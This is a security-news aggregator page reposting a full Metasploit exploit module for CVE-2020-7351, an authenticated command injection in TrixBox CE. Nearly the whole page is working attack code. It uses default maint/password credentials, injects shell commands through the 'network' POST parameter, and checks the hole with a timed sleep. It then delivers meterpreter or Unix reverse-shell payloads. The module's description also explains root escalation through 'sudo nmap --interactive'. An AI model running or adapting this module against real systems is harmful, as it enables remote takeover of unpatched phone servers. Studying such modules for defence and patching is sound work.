HackDig : Dig high-quality web security articles for hackers

TrixBox CE 2.8.0.4 Command Execution

2020-05-24 08:46
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TrixBox CE endpoint_devicemap.php Authenticated Command Execution',        'Description' => %q{          This module exploits an authenticated OS command injection          vulnerability found in Trixbox CE version 1.2.0 to 2.8.0.4          inclusive in the "network" POST parameter of the          "/maint/modules/endpointcfg/endpoint_devicemap.php" page.          Successful exploitation allows for arbitrary command execution          on the underlying operating system as the "asterisk" user.          Users can easily elevate their privileges to the "root" user          however by executing "sudo nmap --interactive" followed by "!sh"          from within nmap.        },        'Author' => [          # Obrela Labs Team - Discovery and Metasploit module          'Anastasios Stasinopoulos (@ancst)'        ],        'References' => [          ['CVE', '2020-7351'],          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/13353'] # First ref is this module        ],        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Payload' => { 'BadChars' => "x00" },        'DisclosureDate' => 'Apr 28 2020',        'Targets' =>          [            [              'Automatic (Linux Dropper)',              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },              'Type' => :linux_dropper            ],            [              'Automatic (Unix In-Memory)',              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },              'Type' => :unix_memory            ]          ],        'Privileged' => false,        'DefaultTarget' => 0      )    )    register_options(      [        OptString.new('HttpUsername', [ true, 'User to login with', 'maint']),        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),      ]    )  end  def user    datastore['HttpUsername']  end  def pass    datastore['HttpPassword']  end  def get_target(res)    version = res.body.scan(/v(d.d.{0,1}d{0,1}.{0,1}d{0,1})/).flatten.first    if version.nil?      version = res.body.scan(/Version: (d.d.{0,1}d{0,1}.{0,1}d{0,1})/).flatten.first      if version.nil?        print_error("#{peer} - Unable to grab version of Trixbox CE installed on target!")        return nil      end    end    print_good("#{peer} - Trixbox CE v#{version} identified.")    if Gem::Version.new(version).between?(Gem::Version.new('2.6.0.0'), Gem::Version.new('2.8.0.4'))      @uri = normalize_uri(target_uri.path, '/maint/modules/endpointcfg/endpoint_devicemap.php')    elsif Gem::Version.new(version).between?(Gem::Version.new('2.0.0.0'), Gem::Version.new('2.4.9.9'))      @uri = normalize_uri(target_uri.path, '/maint/modules/11_endpointcfg/endpoint_devicemap.php')    elsif Gem::Version.new(version).between?(Gem::Version.new('1.2.0.0'), Gem::Version.new('1.9.9.9'))      @uri = normalize_uri(target_uri.path, '/maint/endpoint_devicemap.php')    else      return nil    end    return version  end  def login(user, pass, _opts = {})    uri = normalize_uri(target_uri.path, '/maint/')    print_status("#{peer} - Authenticating using "#{user}:#{pass}" credentials...")    res = send_request_cgi({      'uri' => uri,      'method' => 'GET',      'authorization' => basic_auth(user, pass)    })    unless res      # We return nil here, as callers should handle this case      # specifically with their own unique error message.      return nil    end    if res.code == 200      print_good("#{peer} - Authenticated successfully.")    elsif res.code == 401      print_error("#{peer} - Authentication failed.")    else      print_error("#{peer} - The host responded with an unexpected status code: #{res.code}.")    end    return res  rescue ::Rex::ConnectionError    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')    return nil  end  def execute_command(cmd, _opts = {})    send_request_cgi({      'uri' => @uri,      'method' => 'POST',      'authorization' => basic_auth(user, pass),      'vars_post' => {        'network' => ";$(#{cmd})"      }    })  rescue ::Rex::ConnectionError    fail_with(Failure::Unreachable, 'Connection failed.')  end  def check    res = login(user, pass)    unless res      print_error("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")      return CheckCode::Detected    end    if res.code == 200      version = get_target(res)      if version.nil?        # We don't print out an error message here as returning this will        # automatically cause Metasploit to print out an appropriate error message.        return CheckCode::Safe      end      delay = rand(7...10)      cmd = "sleep #{delay}"      print_status("#{peer} - Verifying remote code execution by attempting to execute '#{cmd}'.")      t1 = Time.now.to_i      res = execute_command(cmd)      t2 = Time.now.to_i      unless res        print_error("#{peer} - Connection failed whilst trying to perform the command injection.")        return CheckCode::Detected      end      diff = t2 - t1      if diff >= delay        print_good("#{peer} - Response received after #{diff} seconds.")        return CheckCode::Vulnerable      else        print_error("#{peer} - Response wasn't received within the expected period of time.")        return CheckCode::Safe      end    end  rescue ::Rex::ConnectionError    print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")    return CheckCode::Unknown  end  def exploit    res = login(user, pass)    unless res      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")    end    if res.code == 200      version = get_target(res)      if version.nil?        print_error("#{peer} - The target is not vulnerable.")        return false      end      print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")      case target['Type']      when :unix_memory        execute_command(payload.encoded)      when :linux_dropper        execute_cmdstager(linemax: 130_000)      end    end  rescue ::Rex::ConnectionError    print_error('Rex::ConnectionError caught in check(), could not connect to the target.')    return false  endend


Source: 4500500202-BLW/eussi/moc.ytirucesxc

Read:166 | Comments:0 | Tags:No Tag

“TrixBox CE 2.8.0.4 Command Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools

Tag Cloud